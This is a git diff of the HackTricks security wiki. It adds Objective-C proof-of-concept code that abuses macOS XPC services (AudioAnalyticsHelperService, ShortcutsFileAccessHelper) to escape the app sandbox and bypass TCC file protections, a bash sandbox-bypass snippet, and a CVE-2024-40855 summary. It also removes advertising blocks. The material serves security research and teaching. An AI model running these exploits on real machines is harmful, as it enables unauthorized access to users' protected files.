+-(void)pruneZips:(NSString *)path hourThreshold:(int)threshold withReply:(void (^)(id *))reply;
+-(void)createZipAtPath:(NSString *)path hourThreshold:(int)threshold withReply:(void (^)(id *))reply;
+@end
+void exploit_AudioAnalyticsHelperService(void) {
+ NSString *currentPath = NSTemporaryDirectory();
+ chdir([currentPath UTF8String]);
+ NSLog(@"======== preparing payload at the current path:%@", currentPath);
+ system("mkdir -p compressed/poc.app/Contents/MacOS; touch 1.json");
+ [@"#!/bin/bash\ntouch /tmp/sbx\n" writeToFile:@"compressed/poc.app/Contents/MacOS/poc" atomically:YES encoding:NSUTF8StringEncoding error:0];
+ system("chmod +x compressed/poc.app/Contents/MacOS/poc");
+
+ [[NSBundle bundleWithPath:@"/System/Library/PrivateFrameworks/AudioAnalyticsInternal.framework"] load];
+ NSXPCConnection * conn = [[NSXPCConnection alloc] initWithServiceName:@"com.apple.internal.audioanalytics.helper"];
+ conn.remoteObjectInterface = [NSXPCInterface interfaceWithProtocol:@protocol(AudioAnalyticsHelperServiceProtocol)];
+ [conn resume];
+
+ [[conn remoteObjectProxy] createZipAtPath:currentPath hourThreshold:0 withReply:^(id *error){
+ NSDirectoryEnumerator *dirEnum = [[[NSFileManager alloc] init] enumeratorAtPath:currentPath];
+ NSString *file;
+ while ((file = [dirEnum nextObject])) {
+ if ([[file pathExtension] isEqualToString: @"zip"]) {
+ // open the zip
+ NSString *cmd = [@"open " stringByAppendingString:file];
+ system([cmd UTF8String]);
+
+ sleep(3); // wait for decompression and then open the payload (poc.app)
+ NSString *cmd2 = [NSString stringWithFormat:@"open /Users/%@/Downloads/%@/poc.app", NSUserName(), [file stringByDeletingPathExtension]];
+ system([cmd2 UTF8String]);
+ break;
+ }
+ }
+ }];
+}
+```
+
+#### /System/Library/PrivateFrameworks/WorkflowKit.framework/XPCServices/ShortcutsFileAccessHelper.xpc
+
+This XPC service allows to give read and write access to an arbitarry URL to the XPC client via the method `extendAccessToURL:completion:` which accepted any connection. As the XPC service has FDA, it's possible to abuse these permissions to bypass TCC completely.
+
+The exploit was:
+
+```objectivec
+@protocol WFFileAccessHelperProtocol
+- (void) extendAccessToURL:(NSURL *) url completion:(void (^) (FPSandboxingURLWrapper *, NSError *))arg2;
+@end
+typedef int (*PFN)(const char *);
+void expoit_ShortcutsFileAccessHelper(NSString *target) {
+ [[NSBundle bundleWithPath:@"/System/Library/PrivateFrameworks/WorkflowKit.framework"]load];
+ NSXPCConnection * conn = [[NSXPCConnection alloc] initWithServiceName:@"com.apple.WorkflowKit.ShortcutsFileAccessHelper"];
+ conn.remoteObjectInterface = [NSXPCInterface interfaceWithProtocol:@protocol(WFFileAccessHelperProtocol)];
+ [conn.remoteObjectInterface setClasses:[NSSet setWithArray:@[[NSError class], objc_getClass("FPSandboxingURLWrapper")]] forSelector:@selector(extendAccessToURL:completion:) argumentIndex:0 ofReply:1];
+ [conn resume];
+
+ [[conn remoteObjectProxy] extendAccessToURL:[NSURL fileURLWithPath:target] completion:^(FPSandboxingURLWrapper *fpWrapper, NSError *error) {
+ NSString *sbxToken = [[NSString alloc] initWithData:[fpWrapper scope] encoding:NSUTF8StringEncoding];
+ NSURL *targetURL = [fpWrapper url];
+
+ void *h = dlopen("/usr/lib/system/libsystem_sandbox.dylib", 2);
+ PFN sandbox_extension_consume = (PFN)dlsym(h, "sandbox_extension_consume");
+ if (sandbox_extension_consume([sbxToken UTF8String]) == -1)
+ NSLog(@"Fail to consume the sandbox token:%@", sbxToken);
+ else {
+ NSLog(@"Got the file R&W permission with sandbox token:%@", sbxToken);
+ NSLog(@"Read the target content:%@", [NSData dataWithContentsOfURL:targetURL]);
+ }
+ }];
+}
+```
+
### Static Compiling & Dynamically linking
[**This research**](https://saagarjha.com/blog/2020/05/20/mac-app-store-sandbox-escape/) discovered 2 ways to bypass the Sandbox. Because the sandbox is applied from userland when the **libSystem** library is loaded. If a binary could avoid loading it, it would never get sandboxed:
@@ -75,6 +231,27 @@ ld -o shell shell.o -macosx_version_min 13.0
ld: dynamic executables or dylibs must link with libSystem.dylib for architecture arm64
```
+### Not inherited restrictions
+
+As explined in the **[bonus of this writeup](https://jhftss.github.io/A-New-Era-of-macOS-Sandbox-Escapes/)** a sandbox restriction like:
+
+```
+(version 1)
+(allow default)
+(deny file-write* (literal "/private/tmp/sbx"))
+```
+
+can be bypassed by a new process executing for example:
+
+```bash
+mkdir -p /tmp/poc.app/Contents/MacOS
+echo '#!/bin/sh\n touch /tmp/sbx' > /tmp/poc.app/Contents/MacOS/poc
+chmod +x /tmp/poc.app/Contents/MacOS/poc
+open /tmp/poc.app
+```
+
+However, of course, this new process won't inherit entitlements or privileges from the parent process.
+
### Entitlements
Note that even if some **actions** might be **allowed by at he sandbox** if an application has an specific **entitlement**, like in:
diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-bypasses/README.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-bypasses/README.md
index 433c14edd..2729a908a 100644
--- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-bypasses/README.md
+++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-bypasses/README.md
@@ -489,6 +489,14 @@ def create_dmg():
Check the **full exploit** in the [**original writeup**](https://theevilbit.github.io/posts/cve-2021-30808/).
+### CVE-2024-40855
+
+As explained in the [original writeup](https://www.kandji.io/blog/macos-audit-story-part2), this CVE abused `diskarbitrationd`.
+
+The function `DADiskMountWithArgumentsCommon` from the public `DiskArbitration` framework performed the security checks. However, it's possible to bypass it by directly calling `diskarbitrationd` and therefore use `../` elements in the path and symlinks.
+
+This allowed an attacker to do arbitrary mounts in any location, including over the TCC database due to the entitlement `com.apple.private.security.storage-exempt.heritable` of `diskarbitrationd`.
+
### asr
The tool **`/usr/sbin/asr`** allowed to copy the whole disk and mount it in another place bypassing TCC protections.
diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-users.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-users.md
index a18c0782c..b83f3783f 100644
--- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-users.md
+++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-users.md
@@ -33,3 +33,5 @@ MacOS also support to login via external identity providers such as FaceBook, Go
Moreover, `accountsd` gets the list of account types from `/Library/Preferences/SystemConfiguration/com.apple.accounts.exists.plist`.
{{#include ../../banners/hacktricks-training.md}}
+
+
diff --git a/src/macos-hardening/macos-useful-commands.md b/src/macos-hardening/macos-useful-commands.md
index 53e6dc36e..5555716d7 100644
--- a/src/macos-hardening/macos-useful-commands.md
+++ b/src/macos-hardening/macos-useful-commands.md
@@ -148,3 +148,5 @@ Without prompts
{{#include ../banners/hacktricks-training.md}}
+
+
diff --git a/src/mobile-pentesting/android-app-pentesting/README.md b/src/mobile-pentesting/android-app-pentesting/README.md
index a3e0c503d..c5e8a0a8d 100644
--- a/src/mobile-pentesting/android-app-pentesting/README.md
+++ b/src/mobile-pentesting/android-app-pentesting/README.md
@@ -2,21 +2,6 @@
{{#include ../../banners/hacktricks-training.md}}
-
-
-Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!
-
-**Hacking Insights**\
-Engage with content that delves into the thrill and challenges of hacking
-
-**Real-Time Hack News**\
-Keep up-to-date with fast-paced hacking world through real-time news and insights
-
-**Latest Announcements**\
-Stay informed with the newest bug bounties launching and crucial platform updates
-
-**Join us on** [**Discord**](https://discord.com/invite/N3FrSbmwdy) and start collaborating with top hackers today!
-
## Android Applications Basics
It's highly recommended to start reading this page to know about the **most important parts related to Android security and the most dangerous components in an Android application**:
@@ -231,21 +216,6 @@ content-protocol.md
---
-
-
-Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!
-
-**Hacking Insights**\
-Engage with content that delves into the thrill and challenges of hacking
-
-**Real-Time Hack News**\
-Keep up-to-date with fast-paced hacking world through real-time news and insights
-
-**Latest Announcements**\
-Stay informed with the newest bug bounties launching and crucial platform updates
-
-**Join us on** [**Discord**](https://discord.com/invite/N3FrSbmwdy) and start collaborating with top hackers today!
-
---
## Dynamic Analysis
@@ -559,21 +529,6 @@ Probably you know about this kind of vulnerabilities from the Web. You have to b
---
-
-
-Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!
-
-**Hacking Insights**\
-Engage with content that delves into the thrill and challenges of hacking
-
-**Real-Time Hack News**\
-Keep up-to-date with fast-paced hacking world through real-time news and insights
-
-**Latest Announcements**\
-Stay informed with the newest bug bounties launching and crucial platform updates
-
-**Join us on** [**Discord**](https://discord.com/invite/N3FrSbmwdy) and start collaborating with top hackers today!
-
## Automatic Analysis
### [MobSF](https://github.com/MobSF/Mobile-Security-Framework-MobSF)
@@ -783,6 +738,10 @@ Find a step-by-step guide to deobfuscate the apk in [https://blog.lexfo.fr/dexgu
You can upload an obfuscated APK to their platform.
+### [Deobfuscate android App]https://github.com/In3tinct/deobfuscate-android-app
+
+This is a LLM tool to find any potential security vulnerabilities in android apps and deobfuscate android app code. Uses Google's Gemini public API.
+
### [Simplify](https://github.com/CalebFenton/simplify)
It is a **generic android deobfuscator.** Simplify **virtually executes an app** to understand its behavior and then **tries to optimize the code** so it behaves identically but is easier for a human to understand. Each optimization type is simple and generic, so it doesn't matter what the specific type of obfuscation is used.
@@ -815,21 +774,6 @@ AndroL4b is an Android security virtual machine based on ubuntu-mate includes th
- [https://www.vegabird.com/yaazhini/](https://www.vegabird.com/yaazhini/)
- [https://github.com/abhi-r3v0/Adhrit](https://github.com/abhi-r3v0/Adhrit)
-
-
-Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!
-
-**Hacking Insights**\
-Engage with content that delves into the thrill and challenges of hacking
-
-**Real-Time Hack News**\
-Keep up-to-date with fast-paced hacking world through real-time news and insights
-
-**Latest Announcements**\
-Stay informed with the newest bug bounties launching and crucial platform updates
-
-**Join us on** [**Discord**](https://discord.com/invite/N3FrSbmwdy) and start collaborating with top hackers today!
-
{{#include ../../banners/hacktricks-training.md}}
diff --git a/src/mobile-pentesting/android-app-pentesting/bypass-biometric-authentication-android.md b/src/mobile-pentesting/android-app-pentesting/bypass-biometric-authentication-android.md
index b22ea3000..fe8a5153a 100644
--- a/src/mobile-pentesting/android-app-pentesting/bypass-biometric-authentication-android.md
+++ b/src/mobile-pentesting/android-app-pentesting/bypass-biometric-authentication-android.md
@@ -2,11 +2,6 @@
{{#include ../../banners/hacktricks-training.md}}
-
-
-Deepen your expertise in **Mobile Security** with 8kSec Academy. Master iOS and Android security through our self-paced courses and get certified:
-
-{% embed url="https://academy.8ksec.io/" %}
## **Method 1 – Bypassing with No Crypto Object Usage**
@@ -79,11 +74,6 @@ There are specialized tools and scripts designed to test and bypass authenticati
- [https://securitycafe.ro/2022/09/05/mobile-pentesting-101-bypassing-biometric-authentication/](https://securitycafe.ro/2022/09/05/mobile-pentesting-101-bypassing-biometric-authentication/)
-
-
-Deepen your expertise in **Mobile Security** with 8kSec Academy. Master iOS and Android security through our self-paced courses and get certified:
-
-{% embed url="https://academy.8ksec.io/" %}
{{#include ../../banners/hacktricks-training.md}}
diff --git a/src/mobile-pentesting/android-app-pentesting/content-protocol.md b/src/mobile-pentesting/android-app-pentesting/content-protocol.md
index 0c5c5a51d..896de67f0 100644
--- a/src/mobile-pentesting/android-app-pentesting/content-protocol.md
+++ b/src/mobile-pentesting/android-app-pentesting/content-protocol.md
@@ -1,8 +1,5 @@
{{#include ../../banners/hacktricks-training.md}}
-
-
-{% embed url="https://websec.nl/" %}
**This is a summary of the post [https://census-labs.com/news/2021/04/14/whatsapp-mitd-remote-exploitation-CVE-2021-24027/](https://census-labs.com/news/2021/04/14/whatsapp-mitd-remote-exploitation-CVE-2021-24027/)**
@@ -91,9 +88,6 @@ Proof-of-Concept HTML:
.png)
.png)
 (1) (1) (1) (1) (1) (1).png)
.png)
.png)
.png)
.png)